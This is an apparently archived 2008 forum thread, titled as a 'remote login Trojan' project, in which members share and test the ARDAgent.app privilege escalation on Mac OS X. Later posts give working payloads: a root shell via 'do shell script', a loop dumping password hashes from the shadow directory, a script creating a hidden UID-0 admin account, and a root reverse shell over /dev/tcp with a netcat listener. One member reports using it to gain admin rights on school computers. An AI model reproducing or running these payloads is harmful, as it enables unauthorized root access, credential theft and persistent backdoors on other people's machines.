remote login Trojan, Trying to make a program that will select remote login. |
  |
remote login Trojan, Trying to make a program that will select remote login. |
 Jun 14 2008, 12:37 AM
Post
#431
|
|
 Group: Members Posts: 2192 Joined: 31-March 08 Member No.: 11928  |
hmm well the app names compile for me in platpus i just wanted to change the image to something else and it never shows the image it just shows it like a priview file
-------------------- --Free--
"Go get SUM" - Me "Dont worry ill mount her and then fsck her silly" -Lokin |
 |
 
|
|
Jun 14 2008, 01:30 AM
Post
#432
|
|
|
Group: Members Posts: 1426 Joined: 14-October 05 Member No.: 4296 |
Do you have write access?
|
|
|
|
|
Jun 14 2008, 02:13 AM
Post
#433
|
|
|
Group: Members Posts: 2192 Joined: 31-March 08 Member No.: 11928 |
it says i have custom access?
ughh wow my ipod is completely useless till i figure out this pwange tool thing.... yes i know this is a completely different thread but just thought i would mention that. -------------------- --Free--
"Go get SUM" - Me "Dont worry ill mount her and then fsck her silly" -Lokin |
|
|
|
|
Jun 14 2008, 02:13 AM
Post
#434
|
|
|
Group: Members Posts: 1426 Joined: 14-October 05 Member No.: 4296 |
Is anyone else able to get 'ARDAgent.app' to execute a 'do shell script' command from Script Editor? This is very strange.
Try this AppleScript command in Script Editor... CODE tell application "ARDAgent.app" to do shell script "id" Occasionally I have to run it a few times to get it to go, once I had to quit Script Editor and relaunch it before it ran. It's reproducible on a PPC/G4 Tiger/10.4.11 Mac here, and not at all on two others. I'm extremely curious to know if this works for anyone else and if so, what version of OS X and does your Mac have a PowerPC or Intel processor? I take that back, I just reproduced it on a PPC/G3 Tiger/10.4.11 as well - at first it did not work, I gave up trying and went to do something else, came back and that machine was asleep - woke it up, clicked run and it worked. Hmm. This post has been edited by callmenames: Jun 14 2008, 02:28 AM |
|
|
|
|
Jun 14 2008, 02:41 AM
Post
#435
|
|
|
Group: Members Posts: 2192 Joined: 31-March 08 Member No.: 11928 |
ill try it but where is shell script id located or was it stated in a handler of the apple script?
did i say that right? -------------------- --Free--
"Go get SUM" - Me "Dont worry ill mount her and then fsck her silly" -Lokin |
|
|
|
|
Jun 14 2008, 02:42 AM
Post
#436
|
|
|
Group: Members Posts: 1426 Joined: 14-October 05 Member No.: 4296 |
Andrew, try...
ls -aloR /Volumes/FDSAFA/Treemovie.app To see what the permissions are... Or chmod -Rf 777 /Volumes/FDSAFA/Treemovie.app To give read/write/execute permission for all users. And the AppleScript command is all that's required, just paste it into Script Editor and click run, if you get an error, keep trying it a dozen or so times. 'Do shell script' runs a command line, not only a script but the AppleScript command is 'do shell script'. Sometimes I get this..  And sometimes I get this... CODE "uid=0(root) gid=501(G4admin) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)" One time on each of two systems I got uid=0 and euid=501. Needless to say, if I have ARDAgent.app run the reverse shell command (posted in this thread) instead of having System Events run it, it's a root shell. Without a password. This post has been edited by callmenames: Jun 14 2008, 02:55 AM |
|
|
|
|
Jun 14 2008, 06:41 AM
Post
#437
|
|
 Group: Members Posts: 112 Joined: 21-May 07 Member No.: 8009 |
CODE tell application "ARDAgent.app" to do shell script "id" Works fine for me ! (PPC Leopard). That a great vulnerability ! It also tested it at my school, it allows me to be admin without a password :-) (My school has Tiger intel and ppc installed) But you're right, it doesn't always work, but I just have to wait some seconds. This post has been edited by Wawl: Jun 14 2008, 06:44 AM |
|
|
|
|
Jun 14 2008, 11:01 AM
Post
#438
|
|
|
Group: Members Posts: 1426 Joined: 14-October 05 Member No.: 4296 |
I am flabbergasted as to why a setuid executable, owned by root can also execute 'do shell script' commands, but uh... well... happy hacking everybody! :)
Stoopid-easy ARDAgent tricks: CODE tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0" CODE set hidden_admin_username to "nobodyd"
set hidden_admin_password to "a secret" set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'" tell application "ARDAgent" to do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash This post has been edited by callmenames: Jun 14 2008, 11:08 AM |
|
|
|
|
Jun 14 2008, 11:34 AM
Post
#439
|
|
|
Group: Members Posts: 1426 Joined: 14-October 05 Member No.: 4296 |
Or from Terminal instead of Script Editor...
CODE osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"' And to avoid having to run it repeatedly until it works... CODE while :; do hashes=$( osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"' ); [ "${hashes}" != "" ] && echo "${hashes}" && break; done
This post has been edited by callmenames: Jun 14 2008, 11:40 AM |
|
|
|
|
Jun 14 2008, 12:23 PM
Post
#440
|
|
|
Group: Members Posts: 1426 Joined: 14-October 05 Member No.: 4296 |
And for a full root reverse shell...
In Terminal on the receiving computer, run netcat to listen for the incoming connection. (Replace the 127.0.0.1 with the actual IP address of your computer or leave out the '-s 127.0.0.1' entirely. You may have to port-forward in your router and either turn off the OS X firewall or open the port.) CODE nc -s 127.0.0.1 -l -p 6880 The command line for the other computer... (change the 127.0.0.1 to the public IP address of the receiving computer.) CODE osascript -e 'tell application "ARDAgent" to do shell script "exec 6<>/dev/tcp/127.0.0.1/6880; id >&6; cat <&6 | while read input; do $input >&6 2>&6;echo -n \"${USER}@${HOSTNAME} > \" >&6;done"'
This post has been edited by callmenames: Jun 14 2008, 12:24 PM |
|
|
|
|
| Lo-Fi Version | Time is now: 31st July 2010 - 12:51 AM |
